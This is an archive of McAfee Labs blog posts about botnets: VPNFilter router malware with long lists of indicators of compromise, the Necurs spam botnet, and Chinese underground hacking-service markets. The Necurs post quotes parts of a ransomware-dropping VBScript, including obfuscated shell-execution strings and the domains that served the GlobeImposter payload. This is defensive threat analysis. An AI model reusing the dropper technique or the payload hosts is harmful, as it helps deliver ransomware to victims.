Category: botnet

Jun 06 2018

VPNFilter Malware Adds Capabilities to Exploit Endpoints

VPNFilter, a botnet-controlled malware that infects networking devices, was first documented by researchers from Cisco Talos. McAfee Labs also published a blog on May 23 with some initial information.

In our last post we discussed the three stages of infection and the devices affected by the malware, and how it can maintain a persistent presence on an infected device even after a reboot. The malware can also monitor traffic routed through the infected device. (Read the first post for more details.)

In this post we will report new information released by Cisco Talos. The findings reveal that that malware now targets additional devices, including products from Huawei, Asus, D-Link, Ubiquiti Networks, MikroTik, Upvel, ZTE Linksys, Netgear, and TP-Link.

In our previous post, we discussed two modules, a traffic sniffer and Tor, used in Stage 3 of the infection. Now researchers have analysed a third module in the third stage that intercepts network traffic by using a man-in-the-middle attack and injects malicious code while content passes through the router. Using this new module, an attacker can launch an exploit, and perform data exfiltration or a JavaScript injection onto the victim’s device.

The malware added another module that deletes its traces on the infected device. It then clears the flash memory and deletes operating system files, rendering the device inoperable.

The new Stage-3 module’s packet sniffer looks for basic authentication in the traffic content, and also monitors connections for industrial control systems traffic related to the Modbus protocol, which is typically used in SCADA systems. 

Coverage and Mitigation

The aforementioned IOCs are covered as follows:

  • Detection names for files: Linux/VPNFilter
  • V3 DAT with coverage version: 3367
  • V2 DAT with coverage version: 8916

All samples are classified in the GTI cloud as malware, as well as all relevant URLs.

Further Recommendations from the Talos Threat Research Team

  • Reboot SOHO routers and NAS devices to remove the potentially destructive, nonpersistent Stage 2 and Stage 3 malware
  • Work with the manufacturer to ensure that your device is up to date with the latest patches. Apply the updated patches immediately.
  • ISPs should aggressively work with their customers to ensure their devices are patched to the most recent firmware 

Updated Indicators of Compromise and Sample Hashes 

URLs and IP addresses

  • photobucket[.]com/user/millerfred/library
  • photobucket[.]com/user/jeniferaniston1/library
  • photobucket[.]com/user/lisabraun87/library
  • photobucket[.]com/user/eva_green1/library
  • photobucket[.]com/user/suwe8/library
  • photobucket[.]com/user/bob7301/library
  • toknowall[.]com
  • photobucket[.]com/user/amandaseyfried1/library
  • photobucket[.]com/user/nikkireed11/library
  • 4seiwn2ur4f65zo4[.]onion/bin256/update.php
  • zm3lznxn27wtzkwa[.]onion/bin16/update.php
  • photobucket[.]com/user/kmila302/library
  • photobucket[.]com/user/monicabelci4/library
  • photobucket[.]com/user/katyperry45/library
  • photobucket[.]com/user/saragray1/library
  • zuh3vcyskd4gipkm[.]onion/bin32/update.php
  • 6b57dcnonk2edf5a[.]onion/bin32/update.php
  • tljmmy4vmkqbdof4[.]onion/bin32/update.php
  • 46.151.209[.]33
  • 217.79.179[.]14
  • 91.214.203[.]144
  • 94.242.222[.]68
  • 82.118.242[.]124
  • 95.211.198[.]231
  • 195.154.180[.]60
  • 5.149.250[.]54
  • 94.185.80[.]82
  • 91.121.109[.]209
  • 217.12.202[.]40
  • 62.210.180[.]229
  • 91.200.13[.]76

File Hashes

  • 00C9BBC56388E3FFFC6E53EF846AD269E7E31D631FE6068FF4DC6C09FB40C48B
  • 0424167DA27214CF2BE0B04C8855B4CDB969F67998C6B8E719DD45B377E70353
  • 055BBE33C12A5CDAF50C089A29EAECBA2CCF312DFE5E96183B810EB6B95D6C5A
  • 0649FDA8888D701EB2F91E6E0A05A2E2BE714F564497C44A3813082EF8FF250B
  • 081E72D96B750A38EF45E74D0176BEB982905AF4DF6B8654EA81768BE2F84497
  • 0DC1E3F36DC4835DB978A3175A462AA96DE30DF3E5031C5D0D8308CDD60CBEDE
  • 11533EEDC1143A33C1DEAE105E1B2B2F295C8445E1879567115ADEBFDDA569E2
  • 1367060DB50187ECA00AD1EB0F4656D3734D1CCEA5D2D62F31F21D4F895E0A69
  • 14984EFDD5343C4D51DF7C79FD6A2DFD791AA611A751CC5039EB95BA65A18A54
  • 181408E6CE1A215577C1DAA195E0E7DEA1FE9B785F9908B4D8E923A2A831FCE8
  • 1CB3B3E652275656B3AE824DA5FB330CCCD8B27892FB29ADC96E5F6132B98517
  • 1E741EC9452AAB85A2F7D8682EF4E553CD74892E629012D903B521B21E3A15BF
  • 218233CC5EF659DF4F5FDABE028AB43BC66451B49A6BFA85A5ED436CFB8DBC32
  • 24B3931E7D0F65F60BBB49E639B2A4C77DE83648FF08E097FF0FA6A53F5C7102
  • 29AE3431908C99B0FFF70300127F1DB635AF119EE55CD8854F6D3270B2E3032E
  • 2AA7BC9961B0478C552DAA91976227CFA60C3D4BD8F051E3CA7415CEAEB604CA
  • 2AF043730B632D237964DD6ABD24A7F6DB9DC83AAB583532A1238B4D4188396B
  • 2B39634DCE9E7BB36E338764EF56FD37BE6CD0FAA07EE3673C6E842115E3CEB1
  • 2C2412E43F3FD24D766832F0944368D4632C6AA9F5A9610AB39D23E79756E240
  • 2EF0E5C66F6D46DDEF62015EA786B2E2F5A96D94AB9350DD1073D746B6922859
  • 2FFBE27983BC5C6178B2D447D8121CEFAA5FFA87FE7B9E4F68272CE54787492F
  • 313D29F490619E796057D50BA8F1D4B0B73D4D4C6391CF35BAAAACE71EA9AC37
  • 33D6414DCF91B9A665D38FAF4AE1F63B7AA4589FE04BDD75999A5E429A53364A
  • 350EAA2310E81220C409F95E6E1E53BEADEC3CFFA3F119F60D0DAACE35D95437
  • 36E3D47F33269BEF3E6DD4D497E93ECE85DE77258768E2FA611137FA0DE9A043
  • 375EDEDC5C20AF22BDC381115D6A8CE2F80DB88A5A92EBAA43C723A3D27FB0D6
  • 39DC1ADED01DAAF01890DB56880F665D6CAFAB3DEA0AC523A48AA6D6E6346FFF
  • 3BBDF7019ED35412CE4B10B7621FAF42ACF604F91E5EE8A903EB58BDE15688FF
  • 3BD34426641B149C40263E94DCA5610A9ECFCBCE69BFDD145DFF1B5008402314
  • 3DF17F01C4850B96B00E90C880FDFABBD11C64A8707D24488485DD12FAE8EC85
  • 4497AF1407D33FAA7B41DE0C4D0741DF439D2E44DF1437D8E583737A07EC04A1
  • 47F521BD6BE19F823BFD3A72D851D6F3440A6C4CC3D940190BDC9B6DD53A83D6
  • 4896F0E4BC104F49901C07BC84791C04AD1003D5D265AB7D99FD5F40EC0B327F
  • 48BFCBC3162A0B00412CBA5EFF6C0376E1AE4CFBD6E35C9EA92D2AB961C90342
  • 49A0E5951DBB1685AAA1A6D2ACF362CBF735A786334CA131F6F78A4E4C018ED9
  • 4AF2F66D7704DE6FF017253825801C95F76C28F51F49EE70746896DF307CBC29
  • 4BEBA775F0E0B757FF32EE86782BF42E997B11B90D5A30E5D65B45662363ECE2
  • 4BFC43761E2DDB65FEDAB520C6A17CC47C0A06EDA33D11664F892FCF08995875
  • 4C596877FA7BB7CA49FB78036B85F92B581D8F41C5BC1FA38476DA9647987416
  • 4D6CBDE39A81F2C62D112118945B5EEB1D73479386C962ED3B03D775E0DCCFA0
  • 4E022E4E4EE28AE475921C49763EE620B53BF11C2AD5FFFE018AD09C3CB078CC
  • 4FA1854FBEC31F87AE306034FD01567841159CA7793EBA58B90BE5F7FC714D62
  • 4FFE074AD2365DFB13C1C9CE14A5E635B19ACB34A636BAE16FAF9449FB4A0687
  • 51E92BA8DAC0F93FC755CB98979D066234260EAFC7654088C5BE320F431A34FA
  • 579B2E6290C1F7340795E42D57BA300F96AEF035886E80F80CD5D0BB4626B5FC
  • 5BE57B589E5601683218BB89787463CA47CE3B283D8751820D30EEE5E231678C
  • 5CF43C433FA1E253E937224254A63DC7E5AD6C4B3AB7A66EC9DB76A268B4DEEB
  • 5D94D2B5F856E5A1FC3A3315D3CD03940384103481584B80E9D95E29431F5F7A
  • 5DABBCE674B797AAA42052B501FB42B20BE74D9FFCB0995D933FBF786C438178
  • 5E715754E9DA9ED972050513B4566FB922CD87958ECF472D1D14CD76923AE59A
  • 5F6EE521311E166243D3E65D0253D12D1506750C80CD21F6A195BE519B5D697F
  • 638957E2DEF5A8FDA7E3EFEFFF286E1A81280D520D5F8F23E037C5D74C62553C
  • 6449AAF6A8153A9CCBCEF2E2738F1E81C0D06227F5CF4823A6D113568F305D2A
  • 6807497869D9B4101C335B1688782AB545B0F4526C1E7DD5782C9DEB52EE3DF4
  • 6A76E3E98775B1D86B037B5EE291CCFCFFB5A98F66319175F4B54B6C36D2F2BF
  • 6D8877B17795BB0C69352DA59CE8A6BFD7257DA30BD0370EED8428FAD54F3128
  • 6E7BBF25EA4E83229F6FA6B2FA0F880DDE1594A7BEC2AAC02FF7D2D19945D036
  • 7093CC81F32C8CE5E138A4AF08DE6515380F4F23ED470B89E6613BEE361159E1
  • 70C271F37DC8C3AF22FDCAD96D326FE3C71B911A82DA31A992C05DA1042AC06D
  • 776CB9A7A9F5AFBAFFDD4DBD052C6420030B2C7C3058C1455E0A79DF0E6F7A1D
  • 78FEE8982625D125F17CF802D9B597605D02E5EA431E903F7537964883CF5714
  • 797E31C6C34448FBECDA10385E9CCFA7239BB823AC8E33A4A7FD1671A89FE0F6
  • 7A66D65FA69B857BEEEAAEF67EC835900EEE09A350B6F51F51C83919C9223793
  • 7E5DCA90985A9FAC8F115EAACD8E198D1B06367E929597A3DECD452AAA99864B
  • 7EE215469A7886486A62FEA8FA62D3907F59CF9BF5486A5FE3A0DA96DABEA3F9
  • 7F6F7C04826C204E2FC5C1EDDB8332AFE1669A4856229921C227694899E7ADA8
  • 80C20DB74C54554D9936A627939C3C7EA44316E7670E2F7F5231C0DB23BC2114
  • 81CBE57CD80B752386EE707B86F075AD9AB4B3A97F951D118835F0F96B3AE79D
  • 82CD8467E480BCD2E2FC1EFB5257BBE147386F4A7651D1DA2BFD0AB05E3D86B9
  • 840BA484395E15782F436A7B2E1EEC2D4BF5847DFD5D4787AE64F3A5F668ED4F
  • 8505ECE4360FAF3F454E5B47239F28C48D61C719B521E4E728BC12D951ECF315
  • 879BE2FA5A50B7239B398D1809E2758C727E584784BA456D8B113FC98B6315A2
  • 8A20DC9538D639623878A3D3D18D88DA8B635EA52E5E2D0C2CCE4A8C5A703DB1
  • 8DE0F244D507B25370394BA158BD4C03A7F24C6627E42D9418FB992A06EB29D8
  • 8F3E1E3F0890AD40D7FA66939561E20C0E5FD2A02B1DEA54F3899AFF9C015439
  • 90EFCAEAC13EF87620BCAAF2260A12895675C74D0820000B3CD152057125D802
  • 94EEFB8CF1388E431DE95CAB6402CAA788846B523D493CF8C3A1AA025D6B4809
  • 952F46C5618BF53305D22E0EAE4BE1BE79329A78AD7EC34232F2708209B2517C
  • 95840BD9A508CE6889D29B61084EC00649C9A19D44A29AEDC86E2C34F30C8BAF
  • 98112BD4710E6FFE389A2BEB13FF1162017F62A1255C492F29238626E99509F3
  • 99944AD90C7B35FB6721E2E249B76B3E8412E7F35F6F95D7FD3A5969EAA99F3D
  • 9B039787372C6043CCE552675E3964BF01DE784D1332DDC33E4419609A6889F1
  • 9B455619B4CBFEB6496C1246BA9CE0E4FFA6736FD536A0F99686C7E185EB2E22
  • A15B871FCB31C032B0E0661A2D3DD39664FA2D7982FF0DBC0796F3E9893AED9A
  • A168D561665221F992F51829E0B282EEB213B8ACA3A9735DBBAECC4D699F66B9
  • A3CF96B65F624C755B46A68E8F50532571CEE74B3C6F7E34EECB514A1EB400CF
  • A41DA0945CA5B5F56D5A868D64763B3A085B7017E3568E6D49834F11952CB927
  • A6E3831B07AB88F45DF9FFAC0C34C4452C76541C2ACD215DE8D0109A32968ACE
  • AB789A5A10B4C4CD7A0EB92BBFCF2CC50CB53066838A02CFB56A76417DE379C5
  • ACF32F21EC3955D6116973B3F1A85F19F237880A80CDF584E29F08BD12666999
  • AE1353E8EFE25B277F52DECFAB2D656541FFDF7FD10466D3A734658F1BC1187A
  • AE74F62881EB224E58F3305BB1DA4F5CB7CCFF53C24AB05DB622807D74E934FB
  • AFACB38EA3A3CAFE0F8DBD26DEE7DE3D0B24CDECAE280A9B884FBAD5ED195DE7
  • B0EDF66D4F07E5F58B082F5B8479D48FBAB3DBE70EBA0D7E8254C8D3A5E852EF
  • B431AEBC2783E72BE84AF351E9536E8110000C53EBB5DB25E89021DC1A83625E
  • B9770EC366271DACDAE8F5088218F65A6C0DD82553DD93F41EDE586353986124
  • BA9FEE47DCC7BAD8A7473405AABF587E5C8D396D5DD5F6F8F90F0FF48CC6A9CE
  • BAD8A5269E38A2335BE0A03857E65FF91620A4D1E5211205D2503EF70017B69C
  • BC51836048158373E2B2F3CDB98DC3028290E8180A4E460129FEF0D96133EA2E
  • BE3DDD71A54EC947BA873E3E10F140F807E1AE362FD087D402EFF67F6F955467
  • BFD028F78B546EDA12C0D5D13F70AB27DFF32B04DF3291FD46814F486BA13693
  • C084C20C94DBBFFED76D911629796744EFF9F96D24529B0AF1E78CDA54CDBF02
  • C0CFB87A8FAED76A41F39A4B0A35AC6847FFC6AE2235AF998EE1B575E055FAC2
  • C2BCDE93227EB1C150E555E4590156FE59929D3B8534A0E2C5F3B21EDE02AFA0
  • C8A82876BEED822226192EA3FE01E3BD1BB0838AB13B24C3A6926BCE6D84411B
  • CA0BB6A819506801FA4805D07EE2EBAA5C29E6F5973148FE25ED6D75089C06A7
  • CCCBF9BFF47B3FD391274D322076847A3254C95F95266EF06A3CA8BE75549A4B
  • CD8CF5E6A40C4E87F6EE40B9732B661A228D87D468A458F6DE231DD5E8DE3429
  • D09F88BAF33B901CC8A054D86879B81A81C19BE45F8E05484376C213F0EEDDA2
  • D1BC07B962CCC6E3596AA238BB7EDA13003EA3CA95BE27E8244E485165642548
  • D1E6EC5761F78899332B170C4CA7158DCCD3463DAB2E58E51E5B6C0D58C7D84F
  • D2DE662480783072B82DD4D52AB6C57911A1E84806C229F614B26306D5981D98
  • D9A60A47E142DDD61F6C3324F302B35FEECA684A71C09657DDB4901A715BD4C5
  • DBEDE977518143BCEE6044ED86B8178C6FC9D454FA346C089523EEDEE637F3BE
  • DD88273437031498B485C380968F282D09C9BD2373EF569952BC7496EBADADDE
  • E6C5437E8A23D50D44EE47AD6E7CE67081E7926A034D2AC4C848F98102DDB2F8
  • E70A8E8B0CD3C59CCA8A886CAA8B60EFB652058F50CC9FF73A90BC55C0DC0866
  • E74AE353B68A1D0F64B9C8306B2DB46DFC760C1D91BFDF05483042D422BFF572
  • E7AEE375215E33FC5AEBD7811F58A09C37D23E660F3250D3C95AEC48AD01271C
  • E7F65AEEC592B047AC1726EF0D8245229041474A2A71B7386E72AD5DB075F582
  • EAF879370387A99E6339377A6149E289655236ACC8DE88324462DCD0F22383FF
  • EC88FE46732D9AA6BA53EED99E4D116B7444AFD2A52DB988EA82F883F6D30268
  • EEB3981771E448B7B9536BA5D7CD70330402328A884443A899696A661E4E64E5
  • EEC5CD045F26A7B5D158E8289838B82E4AF7CF4FC4B9048EAF185B5186F760DB
  • F30A0FE494A871BD7D117D41025E8D2E17CD545131E6F27D59B5E65E7AB50D92
  • F3D0759DFAB3FBF8B6511A4D8B5FC087273A63CBB96517F0583C2CCE3FF788B8
  • F4F0117D2784A3B8DFEF4B5CB7F2583DD4100C32F9EE020F16402508E073F0A1
  • F5D06C52FE4DDCA0EBC35FDDBBC1F3A406BDAA5527CA831153B74F51C9F9D1B0
  • F989DF3AEEDE247A29A1F85FC478155B9613D4A416428188EDA1A21BD481713A
  • FA229CD78C343A7811CF8314FEBBC355BB9BAAB05B270E58A3E5D47B68A7FC7D
  • FA4B286EEAF7D74FE8F3FB36D80746E18D2A7F4C034AE6C3FA4C917646A9E147
  • FC9594611445DE4A0BA30DAF60A7E4DEC442B2E5D25685E92A875ACA2C0112C9
  • FCB6FF6A679CA17D9B36A543B08C42C6D06014D11002C09BA7C38B405B50DEBE
  • FE46A19803108381D2E8B5653CC5DCE1581A234F91C555BBFFF63B289B81A3DC
  • FF118EDB9312C85B0B7FF4AF1FC48EB1D8C7C8DA3C0E1205C398D2FE4A795F4B
  • FF471A98342BAFBAB0D341E0DB0B3B9569F806D0988A5DE0D8560B6729875B3E
  • FF70462CB3FC6DDD061FBD775BBC824569F1C09425877174D43F08BE360B2B58
  • FFB0E244E0DABBAABF7FEDD878923B9B30B487B3E60F4A2CF7C0D7509B6963BA

The post VPNFilter Malware Adds Capabilities to Exploit Endpoints appeared first on McAfee Blogs.

May 23 2018

VPNFilter Botnet Targets Networking Devices

VPNFilter is a botnet with capabilities to support both intelligence collection and destructive cyberattack operations. The Cisco Talos team recently notified members of the Cyber Threat Alliance (CTA) of its findings and published this blog.

The malware is believed to target networking devices, although the malware’s initial infection vector is still unclear. Talos, which first reported this attack, claims that it has impacted at least 500,000 networking devices during the last few years. The malware can persist on infected devices and can steal website credentials and monitor Modbus SCADA protocols. It also implements file collection, command execution, data extraction, and device management and, even worse, it can render some or all of the infected devices unusable.

The known devices affected by VPNFilter are some network-attached storage (NAS) devices such as Linksys, MikroTik, Netgear, and TP-Link networking equipment in the small and home office (SOHO) space, as well at QNAP.

Malware infection stages

VPNFilter has a three-stage infection.

Stage 1 completes the persistence on the system and uses multiple control mechanisms to find and connect the Stage 2 deployment server.

Stage 2 focuses on file collection, command execution, data extraction, and device management. Some versions possess a self-destruct capability to render itself unusable.

Stage 3 includes two known modules:

  • A traffic sniffer to steal website credentials and monitor Modbus SCADA protocols
  • Tor to communicate with anonymous addresses 

Indicators of compromise and sample hashes

URLs and IPs

photobucket[.]com/user/nikkireed11/library
photobucket[.]com/user/kmila302/library
photobucket[.]com/user/lisabraun87/library
photobucket[.]com/user/eva_green1/library
photobucket[.]com/user/monicabelci4/library
photobucket[.]com/user/katyperry45/library
photobucket[.]com/user/saragray1/library
photobucket[.]com/user/millerfred/library
photobucket[.]com/user/jeniferaniston1/library
photobucket[.]com/user/amandaseyfried1/library
photobucket[.]com/user/suwe8/library
photobucket[.]com/user/bob7301/library
toknowall[.]com

91.121.109[.]209
217.12.202[.]40
94.242.222[.]68
82.118.242[.]124
46.151.209[.]33
217.79.179[.]14
95.211.198[.]231
195.154.180[.]60
5.149.250[.]54
91.200.13[.]76
94.185.80[.]82
62.210.180[.]229
91.200.13[.]76
91.214.203[.]144
6b57dcnonk2edf5a[.]onion/bin32/update.php
tljmmy4vmkqbdof4[.]onion/bin32/update.php
zuh3vcyskd4gipkm[.]onion/bin32/update.php
6b57dcnonk2edf5a[.]onion/bin32/update.php

File hashes

  • First-Stage Malware
    • 50ac4fcd3fbc8abcaa766449841b3a0a684b3e217fc40935f1ac22c34c58a9ec
    • 0e0094d9bd396a6594da8e21911a3982cd737b445f591581560d766755097d92
  • Second-Stage Malware
    • 9683b04123d7e9fe4c8c26c69b09c2233f7e1440f828837422ce330040782d17
    • d6097e942dd0fdc1fb28ec1814780e6ecc169ec6d24f9954e71954eedbc4c70e
    • 4b03288e9e44d214426a02327223b5e516b1ea29ce72fa25a2fcef9aa65c4b0b
    • 9eb6c779dbad1b717caa462d8e040852759436ed79cc2172692339bc62432387
    • 37e29b0ea7a9b97597385a12f525e13c3a7d02ba4161a6946f2a7d978cc045b4
    • 776cb9a7a9f5afbaffdd4dbd052c6420030b2c7c3058c1455e0a79df0e6f7a1d
    • 8a20dc9538d639623878a3d3d18d88da8b635ea52e5e2d0c2cce4a8c5a703db1
    • 0649fda8888d701eb2f91e6e0a05a2e2be714f564497c44a3813082ef8ff250b
  • Third-Stage Malware
    • f8286e29faa67ec765ae0244862f6b7914fcdde10423f96595cb84ad5cc6b344
    • afd281639e26a717aead65b1886f98d6d6c258736016023b4e59de30b7348719

Coverage and mitigation

The aforementioned IOCs are covered as follows:

  • Detection names for files: Linux/VPNFilter and Linux/VPNFilter.a
    • V3 DAT with coverage version: 3353
    • V2 DAT with coverage version: 8902
  • All samples are GTI classified as malware
  • All relevant URLs are GTI classified

Further recommendations from the Talos threat research team:

  • Reboot SOHO routers and NAS devices to remove the potentially destructive, nonpersistent Stage 2 and Stage 3 malware
  • Work with the manufacturer to ensure that your device is up to date with the latest patches. Apply the updated patches immediately.

ISPs should work aggressively with their customers to ensure their devices are patched to the most recent firmware/

The post VPNFilter Botnet Targets Networking Devices appeared first on McAfee Blogs.

Mar 12 2018

Necurs Botnet Leads the World in Sending Spam Traffic

In Q4 2017 we found that the Necurs and Gamut botnets comprised 97% of spam botnet traffic. (See the McAfee Labs Threats Report, March 2018.) Necurs (at 60%) is currently the world’s largest spam botnet. The infected computers operate in a peer-to-peer model, with limited communication between the nodes and the control servers. Cybercriminals can rent access to the botnet to spread their own malicious campaigns.

The most common techniques are email attachments with macros or JavaScript to download malware from different locations. In October, the Locky ransomware campaign used Microsoft’s Dynamic Data Exchange to lure victims into “updating” the attached document with data from linked files—external links that delivered the malware.

In Q4 we noticed several botnet campaigns delivering the following payloads:

  • GlobeImposter ransomware
  • Locky ransomware
  • Scarab ransomware
  • Dridex banking Trojan

A timeline:

Let’s zoom in on one of the campaigns from the Necurs botnet. In the following example, an email automatically sent from a VOIP system informs the victim of a missed call. The email contains an attachment, a Visual Basic script.

In this case, the name is “Outside Caller 19-12-2017 [random nr].” Here is some of the script code:

Execute "Sub Aodunnecessarilybusinesslike(strr):ZabiT.Savetofile writenopopbusinesslikeInPlaceOf , 2 : End Sub"

Disaster = "//21+12:ptth21+12ex"+"e.eUtaLHpbP\21+12elifotevas21+12ydoBes"+"nopser21+12etirw21+12nepo21+12epyT21+12PmeT21+12TeG21+12ssecorP21+12llehs.tpircsW21+12noitacilppA.llehs21+12" & "" 

 

This piece of code makes sure that the embedded code will be saved to a file. Note the second line of code: It is backward and calls the Windows script shell to execute the code. The following code string ensures that the backward line is read properly:

SudForMake = Split("Microsoft.XMLHTTP21+12Adodb.streaM"+StrReverse(Disaster),  "21+12")

 

The following line starts the saved code:

writenopopbusinesslikeMacAttack.Run("cmd."&"exe /c START """" "+" " & ArrArr ) 

 

Once the executable is started, it attempts to download the ransomware from the embedded URLs in the code: 

krapivec = Array("littleblessingscotons.com/jdh673hk?","smarterbaby.com/jdh673hk?","ragazzemessenger.com/jdh673hk?") 

 

The malware downloaded and executed is GlobeImposter ransomware. After encrypting all files and deleting the Volume Shadow copies to block file restore, the user is prompted with the request to buy the decryptor:

Spam botnets are one of the pillars of the cybercrime business. The authors of these botnets understand their market value and spend their rental income on continuous development. Their work keeps the infrastructure running, creates ever-changing spam messages, and delivers these messages to your inbox—with many avoiding spam blockers. This cybercrime effort should inspire your organization to discuss the implementation of DMARC (domain-based message authentication, reporting & conformance). To learn more about how DMARC can help protect against this kind of threat, visit dmarc.org. For more on Necurs, see the McAfee Labs Threats Report, June 2017.

The post Necurs Botnet Leads the World in Sending Spam Traffic appeared first on McAfee Blogs.

Dec 13 2017

Chinese Cybercriminals Develop Lucrative Hacking Services

Underground cybercrime profits in China have likely already exceeded US$15.1 billion (100 billion Chinese yuan); caused more than $13.8 billion (91.5 billion yuan) worth of damage relating to data loss, identity theft, and fraud; and will grow at an even faster pace as underground hackers expand international business operations to increasingly target foreign businesses, according to one report. Advanced hacking tools such as botnet, control server infrastructure, remote access tools, malware creation and obfuscation services, source-code writing services, and targeted exploitation toolkits are available on underground markets.

Other popular malicious tools and hacking services—such as spam and flooding services, denial-of-service or distributed denial-of-service attack scripts, compromised routers, and hijacked accounts—are also available in China on the black market. Criminal groups are well-organized and establish discreet buying and selling processes for malware and hacking services through QQ networks. (Tencent QQ is one of China’s most popular online communication and Internet service portals. It had more than 870 million active monthly users as of 2016. QQ users can communicate with each other or publish comments through QQ forums, shared space, QQ groups, and private chatrooms.)

Criminal groups also establish master-apprentice relationships to recruit and train new members to expand their criminal enterprise operations. All of these trends cost businesses in China and around the world tens of billions of dollars, as hacking tools sold online can be used to steal intellectual property or create social engineering attacks.

Operating Structure

The Chinese cybercriminal underground market has become more sophisticated and service-oriented as China’s economy becomes more digital. Cybercriminal groups are well-structured with a clear division of work. Contrary to their American and Russian counterparts, Chinese cybercriminals do not rely on the Deep Web. McAfee research indicates that there has been an increasing number of organized crime groups that take advantage of burgeoning QQ networks. These organized crime groups typically possess clear mechanisms for their cybercrime operations. Malware developers usually profit by creating and selling their products online; they do not get involved in underground criminal operations. Their code often includes “backdoors” that offer them continued access to their software.

QQ hacking group masters (qunzhu, 群主), also known as prawns (daxia, 大虾) or car masters (chezu, 车主) by those in Chinese cybercriminal underground networks, are the masterminds of cybercrime gangs. QQ hacking group masters purchase or acquire access to malware programs from a malware writer or wholesaler. As shown in the following graph, QQ hacking group masters recruit members or followers, who are commonly known as apprentices, and instruct apprentices on hacking techniques such as setting up malicious websites to steal personally identifiable information or bank accounts. In most cases, QQ hacking group masters collect “training fees” from the apprentices they recruit. The apprentices later become professional hackers working for their masters. Apprentices are also required to participate in multiple criminal “missions” before they complete the training programs. These hacker groups are usually private: The group masters can accept or deny membership requests on QQ networks.

 

Master-Apprentice Mechanism

Black-hat training is growing in popularity on the black market due to high profit margins in the hacking business. Some hacker groups use these training programs to recruit new members.  Once they complete the training, selected members will be offered an opportunity as apprentices or “hackers in training,” who later become full-time hackers responsible for operations such as targeted attacks, website hacking, and database exfiltration. (See the preceding graph.) The apprentices gain further experience by taking part in cybercrime schemes, including stealing bank account passwords, credit card information, private photos, personal videos, and virtual currency such as Q coins. The following screenshot is an example of black-hat hacker training materials offered by an underground hacker.

Training program offered by an underground hacker.

Products

The Chinese cybercriminal underground business has become more structured, institutional, and accessible in recent years. A great number of QQ hacking groups offer hacking services. Just as in the real world, cybercriminals and hackers take online orders. Prospective customers can fill out their service requests—including types of attacks, targeted IP addresses, tools to be deployed—and process the payments online. For example, some QQ groups provide website takedown services, which can cost up to tens of thousands of yuan, depending on the difficulty of the tasks and the security level of a targeted system. There are also QQ groups that hire black-hat hackers to conduct attacks against commercial and government targets for profit. The following list shows many of the top activities:

  • DDoS services
  • Black-hat training
  • Malware sales
  • Advanced persistent attack services
  • Exploit toolkits sales
  • Source-code writing services
  • Website hacking services
  • Spam and flooding services
  • Traffic sales
  • Phishing website sales
  • Database hacking services

Buying Hacking Services and Malware

Some hacking groups provide 24/7 technical support and customer service for customers who do not have a technical background. A hacking demonstration is also available upon request. Prices are negotiable in some cases. After agreeing on the price, the hacker-for-hire sends an email confirmation with detailed payment information. Prospective clients can transfer payments online through Taobao or Alipay.  However, prospective customers are usually required to submit an upfront deposit, which can be as much as 50% of the agreed price. Once the service is complete, the hacker-for-hire will request payment on the remaining balance.

Steps in the hacking service transaction process:

  • Negotiating price
  • Making a deposit
  • Demonstration (if requested)
  • Beginning the hacking services
  • Paying the balance

Buyers must submit full payment for software purchases such as malware, attack tools, and exploit toolkits.

Steps in the malware purchase transaction process:

  • Negotiating price
  • Paying in full for malware
  • Receiving product or exploit kit

Conclusion

The Chinese cybercriminal underground mostly targets Chinese citizens and businesses. However, a growing number of criminal groups offer hacking services that target foreign websites or businesses. These underground criminal groups are stealthy and have gradually grown in sophistication through an institutionalized chain of command, and by setting master-and-apprentice relationships to expand their business operations.  They offer a variety of malicious tools and hacking services through QQ networks and have established successful surreptitious transaction processes.

 

Follow all our research and stories like these on Twitter at @McAfee_Labs.

The post Chinese Cybercriminals Develop Lucrative Hacking Services appeared first on McAfee Blogs.